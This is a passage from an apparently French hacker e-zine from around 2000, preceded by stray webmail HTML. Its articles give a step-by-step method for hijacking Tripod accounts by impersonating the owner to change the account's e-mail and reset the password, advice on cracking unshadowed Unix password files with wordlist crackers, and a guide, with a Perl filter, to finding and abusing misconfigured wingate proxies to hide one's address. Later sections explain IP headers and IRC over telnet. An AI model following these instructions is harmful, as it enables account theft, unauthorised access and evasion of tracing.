      <TD VALIGN=top ROWSPAN=2 WIDTH=152 BGCOLOR="#000000">
         <P>&nbsp;</P>
      </TD>
   </TR>
   <TR>
      <TD ALIGN=center VALIGN=top ROWSPAN=2 WIDTH=134 BGCOLOR="#000040">
         <P><A HREF="http://adclick.caramail.com/cgi-bin/redirect?TYPE=PUB&FROM=33&IDBANDEAU=CDI27&TARGET=www.cdiscount.com/default.asp%3Frefer=caramail" TARGET="_blank"><IMG SRC="http://ad.caramail.com/pub/CDI27.gif" WIDTH=100 HEIGHT=60 BORDER=0 ALIGN=bottom></A>&nbsp;</P>
      </TD>
</A><TD VALIGN=bottom COLSPAN=2 WIDTH=98>
         <P><A HREF="/Bin/CreationCompte2/FormulaireNomPrenom.asp"><IMG SRC="http://imgsrv.caramail.com/images/cara5.gif" WIDTH=98 HEIGHT=62 BORDER=0 ALIGN=bottom></A></P>
      </TD>
   </TR>
   <TR BGCOLOR="#000000"><TD ALIGN=center VALIGN=top COLSPAN=6 WIDTH=318>
         <P>&nbsp;</P>
      </TD>
      <TD VALIGN=top WIDTH=152>
         <P><A HREF="/Bin/CreationCompte2/FormulaireNomPrenom.asp"><IMG SRC="http://imgsrv.caramail.com/images/lien_creation.gif" WIDTH=144 HEIGHT=20 BORDER=0 ALIGN=bottom></A><BR>
         <IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=10 HEIGHT=10 ALIGN=bottom></P>
      </TD>
   </TR>
   <TR BGCOLOR="#000000">
      <TD ALIGN=center VALIGN=top WIDTH=134 BGCOLOR="#000040">
         <P><FONT SIZE="-2" FACE="Arial,Helvetica" COLOR="#FFFFFF">&reg;Tous
         droits r&eacute;serv&eacute;s 2000</FONT></P>
      </TD>
      <TD VALIGN=top WIDTH=76>
         <P>&nbsp;</P>
      </TD>
      <TD ALIGN=center VALIGN=top COLSPAN=5 WIDTH=242>
         <P><FONT SIZE="-2" FACE="Arial,Helvetica" COLOR="#FFFFFF">Dialogue
         en direct : <B>8605</B> connect&eacute;s<BR>
         CaraPlazza : <B>2493</B> articles en vente</FONT></P>
      </TD>
      <TD ALIGN=center VALIGN=top WIDTH=152>
         <P>&nbsp;</P>
      </TD>
   </TR>
   <TR BGCOLOR="#FFF0C0">
      <TD ALIGN=center VALIGN=top WIDTH=134 BGCOLOR="#FFCC00">
         <P><IMG SRC="http://imgsrv.caramail.com/images/spray_little.gif" WIDTH=132 HEIGHT=22 ALIGN=bottom></P>
      </TD>
      <TD VALIGN=top COLSPAN=7 WIDTH=470>
         <CENTER><FONT SIZE="-2" FACE="Arial, Helvetica">Spray
         Europe: </FONT><A HREF="http://www.spray.net" TARGET="_blank"><FONT SIZE="-2" FACE="Arial, Helvetica">Allemagne</FONT></A><FONT SIZE="-2" FACE="Arial, Helvetica">
         </FONT><A HREF="http://www.spray.fr" TARGET="_blank"><FONT SIZE="-2" FACE="Arial, Helvetica">France</FONT></A><FONT SIZE="-2" FACE="Arial, Helvetica">
         </FONT><A HREF="http://www.spray.it" TARGET="_blank"><FONT SIZE="-2" FACE="Arial, Helvetica">Italie</FONT></A><FONT SIZE="-2" FACE="Arial, Helvetica">
         </FONT><A HREF="http://www.spray.no" TARGET="_blank"><FONT SIZE="-2" FACE="Arial, Helvetica">Norv&egrave;ge</FONT></A><FONT SIZE="-2" FACE="Arial, Helvetica">
         </FONT><A HREF="http://www.spray.se" TARGET="_blank"><FONT SIZE="-2" FACE="Arial, Helvetica">Su&egrave;de</FONT></A><FONT SIZE="-2" FACE="Arial, Helvetica">
         </FONT><A HREF="http://www.seznam.cz" TARGET="_blank"><FONT SIZE="-2" FACE="Arial, Helvetica">Rep.
         Tch&egrave;que</FONT></A></CENTER>
      </TD>
   </TR>
   <TR BGCOLOR="#FFFFFF">
      <TD VALIGN=top COLSPAN=8 WIDTH=604>
         <P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=5 HEIGHT=5 ALIGN=bottom></P>
      </TD>
   </TR>
   <TR BGCOLOR="#FFFFFF">
      <TD ALIGN=center VALIGN=top COLSPAN=8 WIDTH=604>
         <P><FONT SIZE="-2" FACE="Arial,Helvetica">Caramail respecte
         la </FONT><A HREF="javascript:OpenWin();"><FONT SIZE="-2" FACE="Arial,Helvetica">loi
         informatique et libert&eacute;s de
         1978</FONT></A><FONT SIZE="-2" FACE="Arial,Helvetica">.</FONT></P>
      </TD>
   </TR>
</TABLE>
 <INPUT TYPE=hidden NAME=TZ VALUE=0></CENTER>

<P></FORM></P>
</BODY>
</HTML>



@+ 
										By Scurt :)



,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.



      *********************************************************************
	* 4 											  *
	*                    Hack des pages Tripod                          *
	*      										  *
	*			                                par N0s-k         *
	*								                    *
	*********************************************************************



1. Ce dont vous avez besoin

Pour hacker un compte Tripod vous n'avez pas besoin de grand chose. Vous devez avoir 
accs a Internet (vous m'en direz tant...), vous devez aussi avoir l'adresse e-mail avec 
laquelle il s'est enregistr sur Tripod (cherchez un peu, c'est trs trs souvent sur le 
site =)). Vous aurez aussi besoin de deux  trois semaines (c'est le temps d'attente...
c'est donc trs variable, si a se trouve en 48H c'est finish !!) Ensuite vous devez avoir
le nom d'utilisateur qui est trs simple  trouver puisque si vous voulez hack 
www.tripod.com/~lame et bin le nom d'utilisateur est ? "lame", Bravo !!. Aprs vous aurez
besoin du vrai nom de la personne ou celui qu'il a donn en guise de vrai nom...) 
L..., il y a deux choix, soit c'est sur la page, soit vous allez  cette URL: 
http://www.tripod.com/planet/search.html et entrez tous les renseignements que vous 
avez, ou, si vous avez pas de cul, envoyez lui un mail avec "votre page est superbe..
je veux tout savoir sur vous..votre nom ? Votre age ? Votre ville ?....."
n'importe quoi en fait... le but tant d'avoir toutes les infos !
Regardez si par hasard il n'a pas ICQ (les lames se dcrive sur ICQ,c bien connu !). 
Ils vous faut ces informations ! Essayez tout ce que vous voulez mais ayez les !!


2. C'est partit !

Je vous ai pas demand' tout a pour rien, c'tait trs important...la premire tape sera 
de prendre le contrle de l'account en ayant le compte enregistr sous votre adresse e-mail. 
Vous devez avoir une adresse e-mail sur un fournisseur gratuit qui ressemble  la 
vraie... (pas hacker@caramail.com =)) Alors maintenant, utilisez votre nouvelle adresse 
pour crire un message a membership@tripod.com, c'est exactement ce que Tripod nous dit de 
faire... Voila la partie du contrat qui nous le dit:

"If you need to change your e-mail, please contact us at membership@tripod.com with your 
new e-mail adress. Please include your member name, old E-mail adress, and full name in 
the message."

Donc faite exactement +a, dites que vous avez une nouvelle adresse E-mail, et que vous 
voulez que tripod udapte ses donnes ! Ca prend environ une semaine pour qu'il rponde, 
voila ce que vous devriez recevoir:

"Dear "User",

Thank you for informing us of your new E-Mail adress.

We have udapted your membership information:

   Tripod member name: membername (lui il a pas chang)
   New E-mail Adress:  membernam@caramail.com
If you have a homepage with Tripod, you will need to go throught and udapte your page yo 
se new e-mail adress..."

Si vous ne vous en rendez pas compte, vous contrlez son compte ! Tout ce qu'il devrait 
normalement recevoir va tre envoy  vous...Donc si vous voulez le password vous cliquez 
sur "password lost" et vous allez recevoir dans votre E-mail le password....(vous pouvez 
aussi crire  lost@tripod.com, mais dans ce cas l... il faut mettre votre username dans 
le sujet et ne rien mettre dans le message (sinon a marche pas :))...Vous devriez avoir 
une rponse la semaine d'aprs...(ou avant mais rien n'est moins sur...) Mais si vous le 
fait directement sur le site vous le recevrez dans les 5 min.... :)
Et voil... vous avez hack votre page Perso Tripod....Bon hack !

                                                    N0s-K



,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.



      *********************************************************************
	* 5										        *
	*          Les fichiers Password          			        *
	*      										  *
	*			                                par N0s-k         *
	*								                    *
	*********************************************************************



Avant de vous exposer la "mthode" (c juste un logiciel, je ne m'y connais aucunement en Crytpage/decryptage) 
pour dcrypter ces fichiers, il faut savoir  quelle sorte de fichier Password on a  faire...


1. Les fichiers Encrypts et Shadowed
-------------------------------------

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

Voil un exemple d'un fichier password 'parfait' dans le sens qu'il est crackable...c'est 
le jackpot !!! en clair y a plus qu'a sortir le cracker et c'est ok !

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

C'est un autre exemple d'un fichier password, only a la seule petite diffrence qu'il est 
'Shadowed'

Les fichiers Shadowed ne vous laisse pas voir les password encrypts...Bouhhhh ! Et 
malheureusement votre cracker ne peut rien faire contre a...donc vaux mieux chang de 
technique....
Encore un autre exemple de fichiers Shadowed....(il a l'air vrai, n'est ce pas ?)

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Les fichier password "shadowed" ont un "x" a la place du password et quelquefois il y aussi a
la place un "*"


2. Cracker le fichier Password Encrypts
----------------------------------------

Maintenant que vous en savez un petit peu plus sur quoi ressemble les fichiers "password" 
actuellement vous devriez tre capable d'identifier un fichier encrypt normal d'un 
fichier password Shadowed. Maintenant on va parler d'une faon trs simple de les crackers.

Cracker un fichier 'password n'est  pas aussi compliqu que a en a l'air, aussi le fichier
vari de systme a systme.

1. Dj vous devez downloader le fichier sur votre disque dur =)

2. La seconde tape est de trouver un cracker de password ainsi qu'un dictionnaire de mots.
je vous recommande que vous cherchiez Cracker Jack, John The Ripper, Brute Force Cracker 
ou bien encore Jack the Ripper.
Maintenant il vous faut un dictionnaire de mots...Vous pouvez en trouvez sur les pages de Hackers.
En fait qu'est ce qu'un dictionnaire de Mots ?
C'est tout simplement un fichier contenant toutes les combinaisons de mot/lettres/chiffres
ralisable avec un certain nombre de lettre ou de nombre (Vous imaginez bien que a fait 
plus de 10.000 mots souvent !).                                                            

3. Aprs vous le lancer votre cracker et aprs vous attendez en moyenne 2-3 Jours (sauf si
il tombe dessus ds le dbut =)) C'est long mais avouez que l'on ne le regrette pas =))


Conclusion:
-----------

Cracker un fichier password n'est pas plus compliquer que de lancer un programme...  
condition de trouver un fichier password valide ce qui avouons le est de plus en plus 
difficile....


												NOs-K



,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.



                               ////////////////////////////////////////////                                                                         
                               // 6 //////////////////////////////////////                                                                       
                               /////////////Wingate: (Le NB how-to)//////
                               /////////////////////////////////////////
                               /////////////////////////////par sKoop//


Intro:

Les wingates sont trs souvent utilises dans les petits rseaux informatiques, 
la plupart ne sont pas securis et mal configur. Je vais donc vous expliquer 
comment trouver des wingates, et comment vous en servir.


1) Trouver des Wingates:

Il y a plusieurs manires de trouver des wingates, la premire, vous tes un lamer 
et vous allez les chercher sur Internet. http://www.cyberarmy.com/lists/wingate/
La deuxime solution, vous tes comme moi un newbie et je vais vous expliquer. 
La troisime, vous vous y connaissez pas mal et vous pouvez d'ores et deja passer 
 l'article suivant car vous avez vos propres techniques.

La technique de recherche de wingates sous irc:
Vous vous connectez comme d'habitude  votre serveur undernet prfr et vous 
tapez stats g . La, une liste de donnes d'ips s'affiche  l'cran, ce sont celles 
qui se sont fait bannir par le serveur. Dans cette liste, il y en a qui se sont 
fait banner car leurs proxy ou leurs wingate tait mal configur. J'ai ecrit un 
petit programme en Perl pour trier ces donnes, ce n'est qu'une version beta, 
je n'ai pas le temps d'en ecrire une meilleure car :
1- Je suis newbie en programmation Perl.
2- Le magazine doit sortir demain. 
Vous pouvez bien evidemment modifier le peu de code source qu'il y a,  condition 
que vous gardiez le mme nom pour l'application et que vous mettiez votre nom 
ainsi que mon nom et les modifications que vous y avez apportes.

#!/usr/local/bin/perl

print "   stats2wgates v 1.0b1 \n   par sKoop : sKoop\@programmer.net \n\n" ;
open (WG, "irc_stats.txt") or die "Impossible d'ouvrir irc_stats.txt : $!\n";
while(<WG>) {
if (grep /wingate/ , $_) {
$ligne = $_ ;
print "$ligne" ;
$gate_trouve = "vrai"
}
}
close (WG) ;
if (!$gate_trouve) {
print "Aucune Wingate n'a te trouv dans vos stats irc :(" ;
}

Donc, vous enregistrez la liste de donnes que vous venez de voir apparaitre a 
l'cran dans un fichier que vous nommerez irc_stats.txt et qui se trouvera dans 
le mme repertoire que mon programme nomm stats2wgates.pl
Vous lancez le programme avec la commande:
> perl stats2wingate.pl

Une liste devrait apparaitre de cette forme:


< states2wgates v 1.0b1
< par sKoop : sKoop@programmer.net

<**@3ff81a3b.dsl.flashcom.net 1/09/00 11:26:40 :Banned *@3ff81a3b.dsl.flashcom.net[1] until Fri
Sep 01 08:26:51AM 2000 GMT [967796811]: Misconfigured proxy/wingate - may be attempting to
clone/spam/flood
< ...

L'adresse ip du wingate possible serait 3ff81a3b.dsl.flashcom.net

A vous maintenant de les tester...


2) Connection a une wingate:

Pour vous connecter a une wingate, vous aurez besoin d'un client telnet.
Rentrez la commande:

> telnet 3ff81a3b.dsl.flashcom.net 23
// Si c'est une wingate, alors vous verrez apparaitre une reponse vous 
// demandant un host:port
< TelNet Gateway Ready
< Enter destination (host_name:port):
// Libre a vous de vous connectez sur n'importe quel serveur en passant par // telnet,
// Vous n'avez juste qu'a rentrer le nom du serveur desirer suivi du port
> Enter destination (host_name:port):lamer_server:123

Voila, le serveur ne verra que l'ip de la wingate, toutes les commandes etant 
passes par elle et rediriges vers le serveur...


Pour passer les commandes, vous devez cependant faire un quote
/quote votre_commande

Conclusion:

Cet article a t ecrit en moins de 10 minutes, une prochaine version de mon programme 
en Perl sera dispo sur www.bsc.fr.st section membre sur ma page. Si j'ai dit une 
betise ou fait une erreur ou si vous desirez me poser une question, alors faites le :
sKoop@programmer.net

Bon wingating...
Skoop



,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.



      *********************************************************************
	* 7											  *
	*                            le Protocole IP                        *
	*      										  *
	*			 par N0s-k                                        *
	*								                    *
	*********************************************************************



1. Intro

Une interconnection de rseaux TCP/IP assure trois types de services,
s'appuyant l'un sur l'autre :

                       --------------------------
                       | service d'applications |
        ------------------------------------------------------
	|            Service de Transport Fiable               |
---------------------------------------------------------------------
| Service de remise de paquet en mode non connects                 |
---------------------------------------------------------------------

Au niveau le plus bas, un service de remise en mode non connect assure la
base du transport sur lequel s'appuie tous les autres services.

Au niveau immediatement superieur, un service de transport fiable constitue
un moyen pour transmettre leurs informations aux services de niveaux
superieur, les applications.

2. Mode Non connect : le protocole IP.


Ce service constitue un systme de remise de paquets, non fiable, agissant
"Pour le mieux" ;p et sans connection. Il est considr comme non fiable car
la remise n'est pas garantie. En pratique, la remise n'aura pas lieu seulement
si le rseau est satur ou en panne. Malgr tout, les erreurs sont tjs possibles
en particulier sur Internet, on ne pourra pas envoyer de fichier avec ce protocole
a moins d'etre trs chanceux ;)

Les paquets peuvent tre perdus ou altrs, independament de tous les autres.
Le Protocole de remise non fiable en mode non connect est apple IP (Internet
Protocol). Il est dcrit dans le RFC n 791 et definit trois normes importantes :

- Units de donnes transfres dans les interconnexions IP. 
Dcrit la strucutre de toutes les donnes qui transitent sur une interconnection 
TCP/IP.

- Fonction de Routage.
Il s'agit l du choix du chemin d'acheminement.

- Un ensemble de rgles concrtisant la concept de remise de paquets non fiable,
traitement des erreurs, conditions de destructions de paquets...

	A. Structure des datagrammes IP
	-------------------------------

Tout comme une trame physique possde une structure, un datagramme IP contient 
deux parties : l'en-tete et la partie donne.

|----------------------------------------------------------|
|0 	      4		     8		16		31   |
|----------------------------------------------------------|
| Ver-   | LGMAT  | Type     |     Longueure Totale        |
| Sion   |        | service  |				     |
------------------------------------------------------------
| Identification             |  DRAP     |  Depl.	     |
|			           |           |  Fragment       |
|----------------------------------------------------------|
|  Dure | Protcoles         | Total de Fragment           |
|  Vie   |                   |  en tete                    |
------------------------------------------------------------
| 			Adresse Ip source                        |
------------------------------------------------------------
|			Adresse Ip Destination                   |
------------------------------------------------------------
| Option Ip ventuelles                             | Bour-|
|						                | rage |
------------------------------------------------------------
|			Donnes...                               |
------------------------------------------------------------

	Le Champ  Version
	-----------------

Cod sur 4 bits, il contient le Numro de version du protocole IP utilise pour crer
le datagramme. Il est utilis pour s'assurer que tous les participants, metteur, 
rcepteur et passerelles intermediaire, sont bien d'accord sur la structure du 
datagramme. Si la norme volue => IPV6, les machines rejettent les datagrammes dont 
le numro de version est diffrent du leur.

	Le Champ LGMAT
	--------------

Egalement cod sur 4 Bits, ce champ indique la longueur de l'en-tete en mots de 32 Bits. 
Une en-tete courante, dpourvue de ces deux champs, a une longueur de 20 octets, soit la
valeur 5 dans le champs LGMAT.

	Le Champ Longueure Total
	------------------------

Il indique la longueur Total, exprim en octet, du Datagramme IP, en-tete et donnes incluses.
La Taille du champ peut donc etre calcul en soustrayant "LGMAT"  "LGR TOTALE". La taille 
maximum du datagramme est de 65535 octets, puisque le champs LGR TOTALE est cod sur 16 Bits.

	Le Champ Type de service
	------------------------

Cod sur 8 bits, il indique la manire dont le datagramme doit etre gr. Il est dcompos
de la manire suivante :

|------------------------------------------------|
| 0    1     2  |   3   |   4   |  5  | 6    7   |
|------------------------------------------------|
| Priorit      |   D   |  T    |  R  | inutilis|
|------------------------------------------------|

Le premier champ de 3 bits (priorit) dfinit la priorit du datagramme : 
de 0 (priorit normale)
 7 (supervision du rseau)

Les bits D, T, R,  indiquent le type d'achemeniment souhait :

--------------------------------------
| D  | Dlai Court                   |
--------------------------------------
| T  | Dbit elev                   |
--------------------------------------
| R  | Demande de grande fiabilit   |
--------------------------------------

	Fragmentation des Datagrammes
	-----------------------------

Le problme est que chaque type de rseau physique autorise une certaine longueur de trame. 
Ainsi,pour Ethernet, la longueur pourra tre de 1500 octets, contre 2044 pour une trame 
token Ring.

Pour des raisons de perfomormances, il n'est pas possible de rduire la taille des 
datagrammes IP en fonction du plus petit denominateur commun des differentes trames 
physiques existantes. Il faut donc procder  un dcoupage du datagramme en fragments lors 
du passage sur des rseaux ayant une MTU (Maximum Transport Unit) plus faible. 
La taille de chaque fragment est choisie pour pouvoir tre encapsule dans une seule trame 
de donnes.

	Rassemblage des datagrammes
      ----------------------------

la question est de savoir s'il faut rassembler les datagrammes a la sortie du rseau a 
Faible a MTU ou une fois arrivs a Destination

Dans le cas de TCp/IP, les fragments, les fragments sont rassembls une fosi arrivs 
a destination, ce qui entraine deux incoveniant :

- Perte d'efficacit au passage sue des rseaux ayant une MTU plus importante. 
- Impossibilit de rassembler un datagramme en cas de perte de fragment.

En pratique, la machine destinataire arme un temporisateur de r"assemblage  la reception 
du premier fragment. Pass le dlais, si tous les fragments ne sont pas arriv, elle procde 
a la destruction de tous les elements sans traiter le datagramme.

	Controle de la Fragmentation du Datagramme
	------------------------------------------

- Le Champ Identification :
---------------------------

Il contient un entier unique identifiant le datagramme

- Le Champ Depl. Fragment :
---------------------------

Ce champ exprime en multiple de 8 octets l'offset de donnes par rapport au datagramme initial et 
commence a 0

- Le champ DRAPEAU :
--------------------

Il est cod sur 3 bits. Les deux bites de poids faible de ce champ de ce champ servent a 
controler la fragmentation. Le premier de ces deux bits ert a indiquer peut etre aplliqu 
(0) ou non (1). Si une passerelle dont le bit DRAPEAU est positionn a 1 et qu'elle est 
oblig de fragment le datagramme, elle le detruit et envoi un message d'erreur.
Le bit de poids faible est appel "fragment a suivre". Il indique a la machien destinataire 
s'il reste encore des fragments a suivre ;) En effet le champs "LGR TOTALE" indique la longueur 
Totale du fragment et non pas du datagramme entier :)

	Le champ dure de vie :
      -----------------------

Indique en seconde la dure maximum de transit du Datagramme. En premier lieu, chaque passerelle 
dcrmente de 1 la dure de vie lorsqu'elle traite le datagramme. En outre, elle dcrmente 
ce champ du nombre de  secondes pendant lequel le datagramme a sjourn chez elle avant 
d'etre servi. Lorsque le champ est arriv a 0, le datagramme est dtruit et un message 
d'erreur est envoy a l'emetteur.

Cela permet d'eviter les datagrammes bouclant indfinimment en cas d'erreurs dans les 
tables de routages...

	Le Champ Protocole :
	--------------------

Son rle est analogue   son homologue pour la tram Ethernet. Il indique quel est le 
protocol de haut niveau qui a t employ pour crer le message transport.

	Le Champ Total de controle :
	----------------------------

Il assure l'integrit des donnes de l'en-tete. Celle-ci est considr comme une suite
d'entiers Entiers de 16 bits, pour lesquels est effectu la somme arithmtique en
complement  un et pour resultats est pris le complement a un du resultat. Pour pouvoir
effectuer le calcul, ce champ est considr contenir zero lors de l'addition.

	Les Champs Adresses IP source et destination :
	----------------------------------------------

Ils contiennent les adresses Ip sur 32 Bits de l'metteur et du destinataire de la
trame. C quand meme pas compliqu a ;)

	Le champ Donnes :
	------------------

Il indique le dbut le dbut de la zone de donnes du datagramme.

	Le champ Option IP :
	--------------------

Il est de longueur variable et n'est que pas obligatoire dans tous les datagrammes. Il
sert essentiellement  des fins de test ou de mise au point.

Il se decompose comme suit:

	0		1  2			3 4 5 6 7
----------------------------------------------------
| Copie    | Classe d'option    | Numro d'option  |
----------------------------------------------------

-------------------------------------------------------------
Classe D'option	|          		Signification           |
-------------------------------------------------------------
	0		|	Datagramme ou supervision rseau    |
-------------------------------------------------------------
	1		|	Reserv pour utilisation future     |
-------------------------------------------------------------
	2		|	Mise au point et mesures            |
-------------------------------------------------------------
	3		|	Reserv pour une utilisation future |
-------------------------------------------------------------

------------------------------------------------------------------------------------------
| Classe d'| N      | Longueur |     Signification                                      |
| option   |D'option |          |                                                        |
------------------------------------------------------------------------------------------
|  0       |   0     | -        | fin de la liste d'option. utilis si les options ne se |
|	     |         |          | termine pas  la fin de l'entete. => champs de bourrage|
------------------------------------------------------------------------------------------
| 0        |   1     | -        | Pas d'operation. Utilis pour aligner les options dans |
|          |         |          | une liste d'option                                     |
------------------------------------------------------------------------------------------
| 0        |   2     | 11       | Restrictions de scurit de scurit et de gestion     |
------------------------------------------------------------------------------------------
| 0        |   3     | var.     |Routage lache, dfini par la source. Utilis pour router|
|          |         |          |un datgramme suivant un chemin prcis                   |
------------------------------------------------------------------------------------------
| 0        |   7     | variable | Enregistrement de route					     |
------------------------------------------------------------------------------------------
| 0        |   8     | 4        | Identificateur de connexion. Transporte un             |
|          |         |          | identificateur satnet (prim)                         |
------------------------------------------------------------------------------------------
| 0        |   9     | Variable | Routage strict, dfini par la source                   |
------------------------------------------------------------------------------------------
| 2        |   4     |Variable  | Horodatage Internet                                    |
------------------------------------------------------------------------------------------

Chaque option apparait l'une a la suite de l'autre.
L'option 'Enregistrement de route' est interessante car elle permet de constituer une
liste d'adresse vide, cree par la source et qui sera remplie au fur et a mesure du parcours 
=> traage ? ;)

L'option "Routage dfini par la source" permet  celle-ci d'imposer un chemin. I peut s'agir 
d'un routage strict (il y aura erreur si le chemin en kestion ne peut etre utilis) ou
d'un routage lache (dans ce cas, il pourra y avoir transitpar un rseau intermdiaire 
pour parcourir deux adresses de la liste)

L'option "HoroDatage Internet" permet d'enregistrer pour chaque passerelle franchie, des infos
sur la date.

	Le Champ Bourrage :
	-------------------

Il dpend des options choisies et permet de garantir que l'en-tete du datagramme possde 
effectivement une taille qui soit un multiple entier de 32 bits. Il contient des bits a 
zero.

3. Conclusion

Val, ct une petite explication du protocole Ip, base du TCP/Ip. J'espre que ct pas 
trop compliqu mais vu que le sujet l'est dj un peu, ct difficile ;)

												N0s-K



                                                                           
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.



                               ////////////////////////////////////////////                                                                         
                               // 8 //////////////////////////////////////                                                                       
                               ///////////Telnet: IRC (Le NB how-to)/////
                               /////////////////////////////////////////
                               /////////////////////////////par sKoop//


Intro:

Vous allez me dire pourquoi ne pas passez directement par le fameux Mirc ou 
bien Ircle ou bien envore Xchat? Et bien c'est simple, tous d'abord pour 
apprendre le protocole d'Irc, qui est assez interessant et puis enfin pour 
pouvoir se connecter au serveurs irc meme sur les plus anciennes machines qui 
disposent (la plupart du temps) d'un logiciel telnet et qui n'ont pas la chance 
de supporter un environnement graphique mais uniquement des lignes de commande.


I) Identification et connexion a un  serveur:

Tout d'abord, vous devrez connaitre votre nom d'utilisateur (le mme que celui 
de votre e-mail), ensuite vous devrez connaitre l'adresse ip de votre machine 
puis l'adresse du serveur auquel vous desirez vous connectez (voir liste au 
chapitre 3), votre adresse e-mail, et vous devez choisir un surnom (nickname). 
Dans l'exemple ci-dessous, mon nom d'utilisateur sera mrspok , mon adresse ip sera 
123.456.789.0 , je desire me connecter a un serveur "Undernet" du nom de 
caen.fr.eu.undernet.org , mon adresse email est mrspok@test.com et j'ai choisi 
comme surnom telnet_user

!! Sachez que votre nom d'utilisateur doit tre le mme que le nom de votre adresse 
e-mail (et en minuscules, le serveur fait une difference entre majuscules et minuscules).
Vous pourrez vous connecter avec un surnom qui lui pourra tre de la forme que vous 
desirez sauf si il est deja prit.

// J'ouvre une session telnet au serveur auquel je desire me connecter (en l'occurrence 
celui de Universite de caen) le port de ce serveur qui gere irc est le port 6667.

telnet caen.fr.eu.undernet.org 6667

// Le serveur renvoi alors:
NOTICE AUTH :*** Looking up your hostname // il recherche votre nom de domaine
NOTICE AUTH :*** Checking Ident           // il recherche votre adresse ip
NOTICE AUTH :*** Found your hostname      // il trouve votre nom de domaine
NOTICE AUTH :*** No ident response        // il ne trouve pas votre adresse ip, normal vous ne lui
avez pas specifi.

// Vous lui envoyer alors des informations afin qu'il vous autorise  vous connecter sur le
// serveur.
// ce sera de la forme
User nom_d_utilisateur \ident(votre.adresse.ip.actuelle)\ \serveur_irc\ :adresse@fournisseur.com
// en l'occurence

User mrspok \ident(123.456.789.0)\ \Caen.Fr.Eu.UnderNet.org\ :mrspok@test.com

// vous devez ensuite entrer votre surnom avec la commande nick

nick telnet_user

// Si tous c'est bien pass, le serveur va vous envoyez un ping, un ping 
// demande  votre ordinateur
// si il est bien connecter et permet entre autre d'viter le spoofing 
// d'ip. Il sera de la forme 
PING :suite_de_nombre. 
// Les nombres changent a  
// chaque connexion, pour chaque utilisateur.
// En l'occurence

PING :338555240

// Vous devez maintenant montrer au serveur que vous etes bien connecter et 
// que c'est bien de votre ordinateur que vient la demande de connection au 
// serveur, vous lui renvoyer alors par la commande PONG :suite_de_nombre 
// la confirmation. Donc

PONG :338555240

// Si tout s'est bien pass, le serveur vous renvoi alors un message de ce 
// type concernant les informations du serveur. Ce message change en 
// fonction du serveur auquel vous vous connecter.

:Caen.Fr.Eu.UnderNet.org 001 telnet_user :Welcome to the Internet Relay Network sKoop
:Caen.Fr.Eu.UnderNet.org 002 telnet_user :Your host is Caen.Fr.Eu.UnderNet.org, runnin
g version u2.10.10.09
:Caen.Fr.Eu.UnderNet.org 003 telnet_user :This server was created Mon Jun 12 2000 at 0
9:35:12 CEST
:Caen.Fr.Eu.UnderNet.org 004 telnet_user Caen.Fr.Eu.UnderNet.org u2.10.10.09 dioswkg b
iklmnopstv
:Caen.Fr.Eu.UnderNet.org 005 sKoop SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNO
TICE MODES=6 MAXCHANNELS=10 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :a
re supported by this server
:Caen.Fr.Eu.UnderNet.org 251 telnet_user :There are 20828 users and 28355 invisible on
 40 servers
:Caen.Fr.Eu.UnderNet.org 252 telnet_user 57 :operator(s) online
:Caen.Fr.Eu.UnderNet.org 253 telnet_user 13 :unknown connection(s)
:Caen.Fr.Eu.UnderNet.org 254 telnet_user 24706 :channels formed
:Caen.Fr.Eu.UnderNet.org 255 telnet_user :I have 1001 clients and 1 servers
:Caen.Fr.Eu.UnderNet.org NOTICE sKoop :Highest connection count: 1837 (1836 clie
nts)
:Caen.Fr.Eu.UnderNet.org 375 telnet_user :- Caen.Fr.Eu.UnderNet.org Message of the Day
 -
